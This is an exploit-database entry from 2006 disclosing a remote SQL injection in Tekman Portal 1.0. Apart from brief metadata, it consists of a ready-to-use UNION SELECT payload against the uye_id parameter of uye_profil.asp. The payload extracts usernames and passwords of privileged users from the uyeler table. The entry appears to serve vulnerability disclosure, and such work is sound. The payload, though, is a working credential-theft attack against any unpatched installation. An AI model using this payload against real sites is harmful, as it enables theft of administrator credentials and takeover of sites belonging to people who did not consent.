id: 860
date: 09/18/2006
title: Tekman Portal 1.0 (tr) Remote SQL Injection Vulnerability
author: Fix TR
cves: 

=========================================================
Tekman Portal 1.0 (tr) Remote SQL Injection Vulnerability
=========================================================



++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability    +
+ Author  : Fix TR                                       +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In  : uye_profil.asp
+ Risk    : High


+ Exp.

http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2



#  0day.today [2023-03-24]  #